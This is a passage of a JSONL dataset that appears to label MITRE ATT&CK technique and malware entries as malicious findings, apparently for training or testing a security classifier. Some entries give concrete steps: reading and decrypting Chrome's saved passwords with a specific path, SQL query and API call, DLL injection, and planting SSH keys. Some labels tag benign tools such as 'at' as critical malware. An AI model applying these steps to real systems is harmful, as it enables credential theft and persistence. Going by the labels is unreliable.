Poisoning", "tactics": ["resource-development"]}}]}
{"id": "mitre_00248", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Credentials from Web Browsers\n\nTechnique: T1555.003\nTactics: credential-access\nPlatforms: Linux, macOS, Windows\n\nAdversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1555.003", "technique_name": "Credentials from Web Browsers", "tactics": ["credential-access"]}}]}
{"id": "mitre_00249", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Rising Sun\n\nType: malware\nPlatforms: Windows\n\n[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Rising Sun", "malware_type": "malware"}}]}
{"id": "mitre_00250", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PowerPunch\n\nType: malware\nPlatforms: Windows\n\n[PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PowerPunch", "malware_type": "malware"}}]}
{"id": "mitre_00251", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Shamoon\n\nType: malware\nPlatforms: Windows\n\n[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. Analysis has linked [Shamoon](https://attack.mitre.org/software/S0140) with [Kwampirs](https://attack.mitre.org/software/S0236) based on multiple shared artifacts and coding patterns.(Citation: Cylera Kwampirs 2022) The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Shamoon", "malware_type": "malware"}}]}
{"id": "mitre_00252", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LunarWeb\n\nType: malware\nPlatforms: Windows\n\n[LunarWeb](https://attack.mitre.org/software/S1141) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2020 including in a compromise of a European ministry of foreign affairs (MFA) together with [LunarLoader](https://attack.mitre.org/software/S1143) and [LunarMail](https://attack.mitre.org/software/S1142). [LunarWeb](https://attack.mitre.org/software/S1141) has only been observed deployed against servers and can use [Steganography](https://attack.mitre.org/techniques/T1001/002) to obfuscate command and control.(Citation: ESET Turla Lunar toolset May 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "LunarWeb", "malware_type": "malware"}}]}
{"id": "mitre_00253", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# GoldenSpy\n\nType: malware\nPlatforms: Windows\n\n[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the \"Intelligent Tax\" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "GoldenSpy", "malware_type": "malware"}}]}
{"id": "mitre_00254", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# POORAIM\n\nType: malware\nPlatforms: Windows\n\n[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "POORAIM", "malware_type": "malware"}}]}
{"id": "mitre_00255", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data Transfer Size Limits\n\nTechnique: T1030\nTactics: exfiltration\nPlatforms: Linux, macOS, Windows, ESXi\n\nAn adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1030", "technique_name": "Data Transfer Size Limits", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00256", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RainyDay\n\nType: malware\nPlatforms: Windows\n\n[RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RainyDay", "malware_type": "malware"}}]}
{"id": "mitre_00257", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Acquire Access\n\nTechnique: T1650\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a \u201cload\u201d that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1650", "technique_name": "Acquire Access", "tactics": ["resource-development"]}}]}
{"id": "mitre_00258", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Boot or Logon Autostart Execution\n\nTechnique: T1547\nTactics: persistence, privilege-escalation\nPlatforms: Linux, macOS, Windows, Network Devices\n\nAdversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547", "technique_name": "Boot or Logon Autostart Execution", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00259", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LiteDuke\n\nType: malware\nPlatforms: Windows\n\n[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "LiteDuke", "malware_type": "malware"}}]}
{"id": "mitre_00260", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# meek\n\nType: tool\nPlatforms: Linux, Windows, macOS\n\n[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "meek", "malware_type": "tool"}}]}
{"id": "mitre_00261", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SplatDropper\n\nType: malware\nPlatforms: Windows\n\n[SplatDropper](https://attack.mitre.org/software/S1232) is a loader that utilizes native windows API to deliver its payload to the victim environment. [SplatDropper](https://attack.mitre.org/software/S1232) has been delivered through RAR archives and used legitimate executable for DLL side-loading. [SplatDropper](https://attack.mitre.org/software/S1232) is known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) and was first observed utilized in 2025.", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SplatDropper", "malware_type": "malware"}}]}
{"id": "mitre_00262", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SamSam\n\nType: malware\nPlatforms: Windows\n\n[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SamSam", "malware_type": "malware"}}]}
{"id": "mitre_00263", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Credentials from Web Browsers\n\nTechnique: T1503\nTactics: credential-access\nPlatforms: Linux, macOS, Windows\n\nAdversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018) \n\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1503", "technique_name": "Credentials from Web Browsers", "tactics": ["credential-access"]}}]}
{"id": "mitre_00264", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Brave Prince\n\nType: malware\nPlatforms: Windows\n\n[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Brave Prince", "malware_type": "malware"}}]}
{"id": "mitre_00265", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RATANKBA\n\nType: malware\nPlatforms: Windows\n\n[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RATANKBA", "malware_type": "malware"}}]}
{"id": "mitre_00266", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Spearphishing Attachment\n\nTechnique: T1598.002\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email. In some cases, they may rely upon the recipient populating information, then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. In other cases, adversaries may leverage techniques such as [HTML Smuggling](https://attack.mitre.org/techniques/T1027/006) to harvest user credentials via fake login portals.(Citation: Huntress HTML Smuggling 2024)\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1598.002", "technique_name": "Spearphishing Attachment", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00267", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Reduce Key Space\n\nTechnique: T1600.001\nTactics: defense-evasion\nPlatforms: Network Devices\n\nAdversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1600.001", "technique_name": "Reduce Key Space", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00268", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exploitation for Defense Evasion\n\nTechnique: T1211\nTactics: defense-evasion\nPlatforms: Linux, Windows, macOS, SaaS, IaaS\n\nAdversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\n\nThere have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1211", "technique_name": "Exploitation for Defense Evasion", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00269", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# gsecdump\n\nType: tool\nPlatforms: Windows\n\n[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "gsecdump", "malware_type": "tool"}}]}
{"id": "mitre_00270", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Chaes\n\nType: malware\nPlatforms: Windows\n\n[Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Chaes", "malware_type": "malware"}}]}
{"id": "mitre_00271", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Timestomp\n\nTechnique: T1099\nTactics: defense-evasion\nPlatforms: Linux, Windows, macOS\n\nAdversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1099", "technique_name": "Timestomp", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00272", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Astaroth\n\nType: malware\nPlatforms: Windows\n\n[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Astaroth", "malware_type": "malware"}}]}
{"id": "mitre_00273", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Trap\n\nTechnique: T1546.005\nTactics: privilege-escalation, persistence\nPlatforms: macOS, Linux\n\nAdversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.005", "technique_name": "Trap", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00274", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# at\n\nType: tool\nPlatforms: Linux, Windows, macOS\n\n[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "at", "malware_type": "tool"}}]}
{"id": "mitre_00275", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Source\n\nTechnique: T1153\nTactics: execution\nPlatforms: Linux, macOS\n\n**This technique has been deprecated and should no longer be used.**\n\nThe source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways source /path/to/filename [arguments] or .**This technique has been deprecated and should no longer be used.** /path/to/filename [arguments]. Take note of the space after the \".\". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.(Citation: Source Manual)\n\nAdversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1153", "technique_name": "Source", "tactics": ["execution"]}}]}
{"id": "mitre_00276", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Masquerade Account Name\n\nTechnique: T1036.010\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows, SaaS, IaaS, Containers, Office Suite, Identity Provider\n\nAdversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as \u201cadmin\u201d, \u201chelp\u201d, or \u201croot.\u201d(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087). \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.010", "technique_name": "Masquerade Account Name", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00277", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# UPSTYLE\n\nType: malware\nPlatforms: Network Devices, Linux\n\n[UPSTYLE](https://attack.mitre.org/software/S1164) is a Python-based backdoor associated with exploitation of Palo Alto firewalls using CVE-2024-3400 in early 2024. [UPSTYLE](https://attack.mitre.org/software/S1164) has only been observed in relation to this exploitation activity, which involved attempted install on compromised devices by the threat actor UTA0218.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "UPSTYLE", "malware_type": "malware"}}]}
{"id": "mitre_00278", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Miner-C\n\nType: malware\n\n[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Miner-C", "malware_type": "malware"}}]}
{"id": "mitre_00279", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Dynamic-link Library Injection\n\nTechnique: T1055.001\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1055.001", "technique_name": "Dynamic-link Library Injection", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00280", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Audio Capture\n\nTechnique: T1123\nTactics: collection\nPlatforms: Linux, macOS, Windows\n\nAn adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1123", "technique_name": "Audio Capture", "tactics": ["collection"]}}]}
{"id": "mitre_00281", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Seth-Locker\n\nType: malware\nPlatforms: Windows\n\n[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021.\n(Citation: Trend Micro Ransomware February 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Seth-Locker", "malware_type": "malware"}}]}
{"id": "mitre_00282", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SSH Authorized Keys\n\nTechnique: T1098.004\nTactics: persistence, privilege-escalation\nPlatforms: Linux, macOS, IaaS, Network Devices, ESXi\n\nAdversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys (or, on ESXi, `/etc/ssh/keys-/authorized_keys`).(Citation: SSH Authorized Keys) Users may edit the system\u2019s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH.(Citation: Broadcom ESXi SSH) The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI\u2019s \u201cadd-metadata\u201d command an adversary may add SSH keys to a user account.(Citation: Google Cloud 